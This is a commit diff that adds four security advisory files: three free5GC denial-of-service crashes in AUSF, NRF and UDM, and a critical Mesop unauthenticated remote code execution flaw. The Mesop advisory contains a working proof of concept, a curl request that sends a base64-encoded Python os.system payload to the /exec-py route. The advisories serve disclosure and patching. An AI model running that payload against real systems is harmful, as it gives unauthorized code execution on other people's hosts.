Skip to content

Commit 5e0bb77

Browse files
1 parent c0a8e74 commit 5e0bb77

4 files changed

Lines changed: 267 additions & 0 deletions

File tree

Lines changed: 69 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,69 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-4jrw-92fg-4jwx",
4+
"modified": "2026-03-18T20:06:14Z",
5+
"published": "2026-03-18T20:06:14Z",
6+
"aliases": [
7+
"CVE-2026-33063"
8+
],
9+
"summary": "free5GC AUSF UE Authentication Panic on Nil SuciSupiMap Interface Conversion",
10+
"details": "**Impact** \nThis is an Improper Null Check vulnerability leading to Denial of Service. \n- **Security Impact**: A remote attacker can cause the AUSF service to panic and crash by sending a crafted UE authentication request that triggers a nil interface conversion in the `GetSupiFromSuciSupiMap` function. This results in complete denial of service for the AUSF authentication service. \n- **Functional Impact**: The `GetSupiFromSuciSupiMap` function attempts to perform an interface conversion from `interface{}` to `*context.SuciSupiMap` without checking if the underlying value is nil. When `SuciSupiMap` is nil, the code panics with \"interface conversion: interface {} is nil, not *context.SuciSupiMap\". \n- **Affected Parties**: All deployments of free5GC v4.0.1 using the AUSF UE authentication service (`/nausf-auth/v1/ue-authentications` endpoint).\n\n**Patches** \nYes, the issue has been patched. \nThe fix is implemented in PR free5gc/ausf#52 (commit: [add specific commit hash if available]). \nUsers should upgrade to the next release of free5GC that includes this commit.\n\n**Workarounds** \nThere is no direct workaround at the application level. The recommendation is to apply the provided patch or restrict access to the AUSF API to trusted sources only.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V4",
14+
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "github.com/free5gc/ausf"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "1.4.2"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/free5gc/free5gc/security/advisories/GHSA-4jrw-92fg-4jwx"
42+
},
43+
{
44+
"type": "WEB",
45+
"url": "https://github.com/free5gc/free5gc/issues/778"
46+
},
47+
{
48+
"type": "WEB",
49+
"url": "https://github.com/free5gc/ausf/pull/52"
50+
},
51+
{
52+
"type": "WEB",
53+
"url": "https://github.com/free5gc/ausf/commit/3b9ac4403c2756dc89a5ed3cdcefe688458588aa"
54+
},
55+
{
56+
"type": "PACKAGE",
57+
"url": "https://github.com/free5gc/free5gc"
58+
}
59+
],
60+
"database_specific": {
61+
"cwe_ids": [
62+
"CWE-476"
63+
],
64+
"severity": "HIGH",
65+
"github_reviewed": true,
66+
"github_reviewed_at": "2026-03-18T20:06:14Z",
67+
"nvd_published_at": null
68+
}
69+
}
Lines changed: 69 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,69 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-7c47-xr7q-p6hg",
4+
"modified": "2026-03-18T20:05:31Z",
5+
"published": "2026-03-18T20:05:31Z",
6+
"aliases": [
7+
"CVE-2026-33062"
8+
],
9+
"summary": "free5GC NRF Discovery EncodeGroupId Function Panics on Malformed group-id-list Parameter",
10+
"details": "**Impact** \nThis is an Improper Input Validation vulnerability leading to Denial of Service. \n- **Security Impact**: A remote attacker can cause the NRF service to panic and crash by sending a crafted HTTP GET request with a malformed `group-id-list` parameter. This results in complete denial of service for the NRF discovery service. \n- **Functional Impact**: The `EncodeGroupId` function attempts to access array indices [0], [1], [2] without validating the length of the split data. When the parameter contains insufficient separator characters, the code panics with \"index out of range\". \n- **Affected Parties**: All deployments of free5GC v4.0.1 using the NRF discovery service.\n\n**Patches** \nYes, the issue has been patched. \nThe fix is implemented in PR free5gc/nrf#80 (commit: [add fix reference here]). \nUsers should upgrade to the next release of free5GC that includes this commit.\n\n**Workarounds** \nThere is no direct workaround at the application level. The recommendation is to apply the provided patch or restrict access to the NRF API to trusted sources only.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V4",
14+
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "github.com/free5gc/nrf"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "1.4.2"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/free5gc/free5gc/security/advisories/GHSA-7c47-xr7q-p6hg"
42+
},
43+
{
44+
"type": "WEB",
45+
"url": "https://github.com/free5gc/free5gc/issues/777"
46+
},
47+
{
48+
"type": "WEB",
49+
"url": "https://github.com/free5gc/nrf/pull/80"
50+
},
51+
{
52+
"type": "WEB",
53+
"url": "https://github.com/free5gc/nrf/commit/dac77d8f8f2e0f041c5634fb3c685dcb9734b872"
54+
},
55+
{
56+
"type": "PACKAGE",
57+
"url": "https://github.com/free5gc/free5gc"
58+
}
59+
],
60+
"database_specific": {
61+
"cwe_ids": [
62+
"CWE-284"
63+
],
64+
"severity": "HIGH",
65+
"github_reviewed": true,
66+
"github_reviewed_at": "2026-03-18T20:05:31Z",
67+
"nvd_published_at": null
68+
}
69+
}
Lines changed: 69 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,69 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-7g27-v5wj-jr75",
4+
"modified": "2026-03-18T20:06:36Z",
5+
"published": "2026-03-18T20:06:36Z",
6+
"aliases": [
7+
"CVE-2026-33064"
8+
],
9+
"summary": "free5GC UDM DataChangeNotification Procedure Panic Due to Nil Pointer Dereference",
10+
"details": "**Impact** \nThis is a NULL Pointer Dereference vulnerability leading to Denial of Service. \n- **Security Impact**: A remote attacker can cause the UDM service to panic and crash by sending a crafted POST request to the `/sdm-subscriptions` endpoint with a malformed URL path containing path traversal sequences (`../`) and a large JSON payload. The `DataChangeNotificationProcedure` function in `notifier.go` attempts to access a nil pointer without proper validation, causing a complete service crash with \"runtime error: invalid memory address or nil pointer dereference\". \n- **Functional Impact**: The service crashes completely, requiring manual restart. All UDM functionality is disrupted until recovery. \n- **Affected Parties**: All deployments of free5GC v4.0.1 using the UDM HTTP callback functionality.\n\n**Patches** \nYes, the issue has been patched. \nThe fix is implemented in PR free5gc/udm#78. \nUsers should upgrade to the next release of free5GC that includes this commit.\n\n**Workarounds** \nThere is no direct workaround at the application level. The recommendation is to apply the provided patch or implement API gateway-level filtering to block requests containing path traversal sequences.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V4",
14+
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "github.com/free5gc/udm"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "1.4.2"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/free5gc/free5gc/security/advisories/GHSA-7g27-v5wj-jr75"
42+
},
43+
{
44+
"type": "WEB",
45+
"url": "https://github.com/free5gc/free5gc/issues/781"
46+
},
47+
{
48+
"type": "WEB",
49+
"url": "https://github.com/free5gc/udm/pull/78"
50+
},
51+
{
52+
"type": "WEB",
53+
"url": "https://github.com/free5gc/udm/commit/65d7070f4bfd016864cbbaefbd506bbc85d2fa92"
54+
},
55+
{
56+
"type": "PACKAGE",
57+
"url": "https://github.com/free5gc/udm"
58+
}
59+
],
60+
"database_specific": {
61+
"cwe_ids": [
62+
"CWE-476"
63+
],
64+
"severity": "HIGH",
65+
"github_reviewed": true,
66+
"github_reviewed_at": "2026-03-18T20:06:36Z",
67+
"nvd_published_at": null
68+
}
69+
}
Lines changed: 60 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,60 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-gjgx-rvqr-6w6v",
4+
"modified": "2026-03-18T20:05:00Z",
5+
"published": "2026-03-18T20:05:00Z",
6+
"aliases": [
7+
"CVE-2026-33057"
8+
],
9+
"summary": "Mesop Affected by Unauthenticated Remote Code Execution via Test Suite Route /exec-py",
10+
"details": "#### Summary\nAn explicit web endpoint inside the `ai/` testing module infrastructure directly ingests untrusted Python code strings unconditionally without authentication measures, yielding standard Unrestricted Remote Code Execution. Any individual capable of routing HTTP logic to this server block will gain explicit host-machine command rights.\n\n#### Details\nThe AI codebase package includes a lightweight debugging Flask server inside `ai/sandbox/wsgi_app.py`. The `/exec-py` route accepts base_64 encoded raw string payloads inside the `code` parameter natively evaluated by a basic `POST` web request. It saves it rapidly to the operating system logic path and injects it recursively using `execute_module(module_path...)`.\n\n```python\n# ai/sandbox/wsgi_app.py\n@flask_app.route(\"/exec-py\", methods=[\"POST\"])\ndef exec_py_route():\n code = base64.urlsafe_b64decode(request.form.get(\"code\"))\n # ... code is blindly written to file and forcefully executed\n```\n\n#### PoC\n```bash\n# Payload:\n# import os\n# os.system('echo \"pwned by attacker\" > /tmp/pwned.txt')\n# \n# Base64 string represents the identical payload block above: \n# aW1wb3J0IG9zCm9zLnN5c3RlbSgnZWNobyAicHduZWQgYnkgYXR0YWNrZXIiID4gL3RtcC9wd25lZC50eHQnKQ==\n\ncurl -X POST http://<target_ip_address_hosting_sandbox>:port/exec-py \\\n -H \"Content-Type: application/x-www-form-urlencoded\" \\\n -d \"code=aW1wb3J0IG9zCm9zLnN5c3RlbSgnZWNobyAicHduZWQgYnkgYXR0YWNrZXIiID4gL3RtcC9wd25lZC50eHQnKQ==\"\n\n# Validate exploitation target execution natively:\n# $ cat /tmp/pwned.txt\n# pwned by attacker\n```\n\n#### Impact\nThis presents trivial severity for systems publicly exposed or lacking strictly verified boundary firewalls due to absolute unauthenticated command injection privileges targeting the direct execution interpreter running this service sandbox.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "PyPI",
21+
"name": "mesop"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "1.2.3"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 1.2.2"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/mesop-dev/mesop/security/advisories/GHSA-gjgx-rvqr-6w6v"
45+
},
46+
{
47+
"type": "PACKAGE",
48+
"url": "https://github.com/mesop-dev/mesop"
49+
}
50+
],
51+
"database_specific": {
52+
"cwe_ids": [
53+
"CWE-94"
54+
],
55+
"severity": "CRITICAL",
56+
"github_reviewed": true,
57+
"github_reviewed_at": "2026-03-18T20:05:00Z",
58+
"nvd_published_at": null
59+
}
60+
}

0 commit comments

Comments
 (0)